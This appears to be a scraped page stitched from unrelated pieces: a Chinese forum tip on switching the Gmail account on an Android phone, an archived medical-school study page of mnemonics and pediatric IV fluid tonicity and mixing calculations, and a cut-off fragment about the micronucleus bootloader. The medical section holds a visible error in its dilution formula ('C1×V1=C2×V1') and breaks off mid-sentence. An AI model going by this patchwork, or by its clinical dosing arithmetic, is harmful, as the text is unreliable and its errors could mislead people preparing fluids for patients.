改变gmail账户,无需恢复出厂设置 - Google手机综合讨论区 - WeiPhone威锋网 iPhone 论坛|iPod Touch 论坛|Google Android手机论坛|我们的iPhone - Powered by Discuz!

改变gmail账户,无需恢复出厂设置

来自XDA,http://forum.xda-developers.com/showthread.php?t=454405
进出菜单settings-applications-manage applications,找到Gmail后clear data后,你就会看到一个提示,提示你需要重新设置gmail,输入新的gmail帐号即可"

2008-12-01

View Archived Post - Welcome to DXY.CN Forum

View Archived Post - Welcome to DXY.CN Forum:

医学基础精华速记
全身骨头虽难记,抓住要点就容易;头颅躯干加四肢,二百零六分开记;
脑面颅骨二十三,躯干总共五十一;四肢一百二十六,全身骨头基本齐;
还有六块体积小,藏在中耳鼓室里。

十二对脑神经
一嗅二视三动眼,四划五叉六外展,七面八听九舌咽,迷走及副舌下全。

微循环的特点:
低、慢、大、变;

影响静脉回流因素:
血量、体位、三泵(心、呼吸、骨骼肌);

激素的一般特征:
无管、有靶、量少、效高;

糖皮质激素对代谢作用:
升糖、解蛋、移脂;

醛固酮的生理作用:
保钠、保水、排钾等等。

烧伤病人早期胃肠道营养
少食多餐,先流后干,早期高脂,逐渐增糖,蛋白量宽.

烧伤补液
先快后慢,先盐后糖,先晶后碱,见尿补钾,适时补碱。

烧伤新九分法
头颈面333(9%*1);手臂肱567(9%*2);躯干会阴27(9%*3);
臀为5足为7,小腿大腿13,21(9%*5+1%)。

手的皮肤管理
手掌正中三指半,剩尺神经一指半,手背挠尺各一半,正中占去三指尖半。

1、心力衰竭的诱因:
感染紊乱心失常 过劳剧变负担重 贫血甲亢肺栓塞 治疗不当也心衰

2、右心衰的体征:三水两大及其他
三水:水肿、胸水、腹水
两大:肝肿大和压痛、颈静脉充盈或怒张
其他:右心奔马律、收缩期吹风性杂音、紫绀

3、洋地黄类药物的禁忌症:
肥厚梗阻二尖窄 急性心梗伴心衰 二度高度房室阻 预激病窦不应该

4、急性心衰的抢救: (本条已有记忆法)

5、房性早搏心电表现:
房早P与窦P异 P-R三格至无级 代偿间歇多不全 可见房早未下传

6、心房扑动心电表现:
房扑不于房速同 等电位线P无踪 大F呈锯齿状 形态大小间隔匀
QRS不增宽 F不均称不纯

7、心房颤动心电表现:
心房颤动P无踪 小f波乱纷纷 三百五至六百次 P-R间期极不均
QRS当正常 增宽合并差传导

8、房室交界性早搏心电表现:
房室交界性早搏 QRS同室上 P必逆行或不见 P-R小于点一二

9、阵发性室上性心动过速的治疗:
刺迷胆碱洋地黄,升压电复抗失常 (注:“刺迷”为刺激迷走神经)

10、继发性高血压的病因:
两肾原醛嗜铬瘤、皮质动脉和妊高

(注:“两肾”——肾实质性高血压、肾血管性高血压;“原醛”——原发性醛固酮增
多症;“嗜铬瘤”——嗜铬细胞瘤;“皮质”——皮质醇增多症;“动脉”——主动脉
缩窄;“妊高”——妊娠高血压)

11、心肌梗塞的症状:
疼痛发热过速心 恶心呕吐失常心 低压休克衰竭心

12、心梗与其他疾病的鉴别:
痛哭流涕、肺腑之言
(注:“痛”——心绞痛;“流”——主动脉瘤夹层分离;“肺”——急性肺动脉栓塞
;“腑”——急腹症;“言”——急性心包炎)

13、心梗的并发症:
心梗并发五种症 动脉栓塞心室膨 乳头断裂心脏破 梗塞后期综合症

14、主动脉瓣狭窄的表现: 难、痛、晕

神经系统
在脑干中,按延髓、脑桥、中脑三段叙述其结构,将脑干的三段整体与脊髓进行比
较,总结其结构变化的规律为:

①灰质不再连贯成柱,而断为核团,但立体位置不变。
②传导束在脑干内交叉走行,打乱了脊髓灰、白质的界限。
③中央管向后敞开,使灰质从腹背关系变为内外关系。

“溶液张力计算与配制”技巧

液体疗法是儿科最常用的治疗方法之一,是儿科学的重要内容,也是每位临床医护学生
必需掌握的基本技能。最难理解的是液体张力的计算与配制。而液体张力计算与配制则
是液体疗法的基础,如对此不理解、不掌握,则将难以学习和运用液体疗法。

1、首先出一道简单的数学算术题让学生自己计算
例1、将10%NaCl10ml稀释至100ml,请问稀释后溶液百分比浓度。学生很快便能
列出算式:
10%×10=X×100,X=1%。

由此引导学生回忆起初中所学的知识—稀释定律:稀释前浓度×稀释前体积=稀释后浓
度×稀释后体积。即:
C1×V1=C2×V1。 并且强调但凡涉及物质浓度的换算,均遵循此定律。

2、接着出一道多项选择题让学生讨论答题问题:

能够用来表达物质浓度的有(  )A.百分比浓度  B.摩尔浓度  C.张力

3、阐述溶液张力的概念及计算

张力是指溶液溶质的微粒对水的吸引力,溶液的浓度越大,对水的吸引力越大。
判断某溶液的张力,是以它的渗透压与血浆渗透压正常值(280~320mosm/L,计
算时取平均值300mosm/L)相比所得的比值,它是一个没有单位但却能够反映物质
浓度的一个数值。

溶液渗透压=(百分比浓度×10×1000×每个分子所能离解的离子数)/分子量。如0.9%
NaCl溶液渗透压=(0.9×10×1000×2)/58.5=308mOsm/L(794.2kPa)该
渗透压与血浆正常渗透压相比,比值约为1,故该溶液张力为1张。

又如5%NaHCO3溶液渗透压=(5×10×1000×2)/84=1190.4mOsm/L(3069.7
kPa)该渗透压与血浆正常渗透压相比,比值约为4,故该溶液张力为4张。

对以上复杂的计算过程,不要求掌握,但要记住张力是物质浓度的一种表达方式,
其换算自然亦遵循稀释定律:C1×V1=C2×V2。

然后列出已标明相应张力的几种常用溶液:

10%(NaCl)11张(临床上可按10张计算)
0.9%(NaCl)1张
5%(NaHCO3)4张
10%(KCl)9张
10%(GS)0张(无张力,相当于水)  

临床上多数情况下就是用以上几种溶液配制成其它所需的液体进行治疗,只需记住此几
种溶液的张力,便可灵活自如地进行配制与计算所需溶液及张力;而不必去追究为什么
10%NaCl张力是10张这一复杂的计算过程。

4、举例说明混合溶液张力的计算
例2、10%NaCl(10ml)+10%GS(90ml),请问该组溶液张力。
你能很快根据C1×V1=C2×V2列出算式:10×10=X×100,X=1张

例3、10%NaCl(20ml)+5%NaHCO3(25ml)+10%GS(255ml),请问
该组溶液张力。
10×20+4×25=X×300,X=1张。

例4、欲配制一组300ml,2/3张液体,现已使用5%NaHCO3(15ml),还需10%
NaCl多少毫升。
10×X+4×15=2/3×300,X=14ml

那么,再加入10%GS271(270)ml后即可配制成所需液体(300-15-14=271ml,GS
为0张)

5、2∶1等张液是抢救休克时扩容的首选溶液,其有固定组份,由2份等渗盐溶液+1份等
渗碱溶液配制而成。对配制2∶1液感到十分困难,为了便于记忆,快速计算、
配制,便给出一个简单的计算公式(推导过程较为复杂,不必阐述)

配制2∶1液Mml,则需
10%NaCl=M/15ml————a
5%NaHCO3=M/12ml———b
10%GS=M-a-bml

例5、配制2∶1液300ml,需10%NaCl、5%NaHCO3、10%GS各多少毫升。

10%NaCl=300/15=20ml
5%NaHCO3=300/12=25ml
10%GS=300-20-25=255ml

似乎很玄的2∶1液通过一个简单的公式便可快速配制出来。

药理学运用记忆法
药理学是研究药物与机体相互作用的规律及其原理的学科,其内容广泛而又复杂,不但
要学习各种药物的药理作用,还要记忆种类繁杂的药物名词、用法及不良反应等。面对
一大堆千奇百怪的新老药名时,记忆起来实在犯难。

1、理解记忆
例如,抑制胃酸分泌药,先简述胃酸分泌机制:内源性组织胺、胃泌素和乙酰胆碱与胃
粘膜壁细胞组织胺受体、胃泌素受体和乙酰胆碱能受体结合后能刺激胃酸分泌;而壁细
胞分泌H+,是通过H+-K+-ATP酶将细胞内H+泵出细胞外。再根据胃酸分泌的不同环节,指
出H2受体阻断药(西咪替丁、雷尼替丁和法莫替丁)与组织胺H2受体结合,M1受体阻断
药(哌仑西平)阻断胆碱能M1受体,H+泵抑制药(奥美拉唑)抑制壁细胞H+-K+-ATP酶
,皆能抑制胃酸分泌而用于治疗消化性溃疡病。由此,就容易记住抑制胃酸分泌常用药
物的不同作用机制。

2、比较记忆
有比较,才能鉴别,才能清晰明确,加深记忆。例如,毛果芸香碱、毒扁豆碱、甘露醇
和噻吗洛尔都可以治疗青光眼,但作用机制各不相同。其中拟胆碱药毛果芸香碱为M受
体兴奋剂,直接兴奋瞳孔括约肌上的M受体使瞳孔缩小;而毒扁豆碱为胆碱酯酶抑制剂
,抑制胆碱酯酶活性,使乙酰胆碱堆积,作用于瞳孔括约肌上的M受体,同样引起瞳孔
缩小。这两种药使瞳孔缩小,虹膜拉向中心,根部变薄,前房角间隙变大,使房水回流
通畅,故能降低眼内压。脱水药甘露醇通过迅速提高血浆渗透压,促使组织间液水份向
血浆转移而产生脱水作用,降低青光眼患者眼内压。β受体阻断药噻吗洛尔因能减少房
水生成,治疗青光眼,而无缩瞳和调节痉挛等不良反应。通过比较,知道这些分散在不
同章节的药物虽然作用机制不同,但都具有相同的药理效应,因而可以放在一起记忆,
还能更好地应用于临床。

3、分类记忆
根据事物的特征划分类别,这就是分类。由于大脑是以类型和关联存储信息在树突上,
所以将事物分类容易记忆。如按作用于肾小管不同部位把利尿药分为三类,包括作用于
髓袢升支粗段髓质部和皮质部的利尿药,如利尿强度最大的速尿、利尿酸等,易致水、
电解质紊乱(含低血钾症)、耳毒性和胃肠道反应;作用于髓袢升支粗段皮质部的利尿
药,如利尿强度中等的氢氯噻嗪,易致低血钾症、高尿酸血症和高血糖症;作用于远曲
小管和集合管的利尿药,如利尿作用较弱的螺内酯、氨苯喋啶有拮抗醛固酮的保钠排钾
作用,可引起高血钾症。由此可见,属于同一类型的利尿药物,其作用部位、作用机制
、利尿强度和不良反应大致相同,归纳分类便于记忆。

4、图表记忆
将文字资料图表化,使之形象生动,无冗长繁琐之弊,有助于记忆.

5、歌诀记忆
编歌诀是将要求掌握的内容简化,用字头,谐音字,方言和俚语等方法,编成饶有趣味
的顺口溜,易于背诵和记忆。例如,把青霉素的抗菌谱编成顺口溜:“链葡螺放白肺炭
(廉颇落荒白灰滩)”。通过说战国时期赵国名将廉颇诈败诱敌“落荒”逃到“白灰滩
”一举歼敌的故事,就可以联想记忆起青霉素的抗菌谱包括溶血性链球菌、敏感的金葡
菌、螺旋体、放线菌、白喉杆菌、肺炎球菌和炭疽杆菌等。又如,把镇痛药的主要药物
功效和副作用编成歌诀:“成瘾吗啡度冷丁,镇痛镇静抑呼吸,镇咳常用可待因,绞痛
配伍阿"

How to upgrade micronucleus

micro micronucleus nucleus 是 ATtiny/ ATMega328p的bootloder, 它的过人之处是给这些芯片带来usb支持. 使得它们可以直接通过usb口来烧录. 我购买了很多 digispark 开发板. 这些开发板小巧方便价格低廉. ...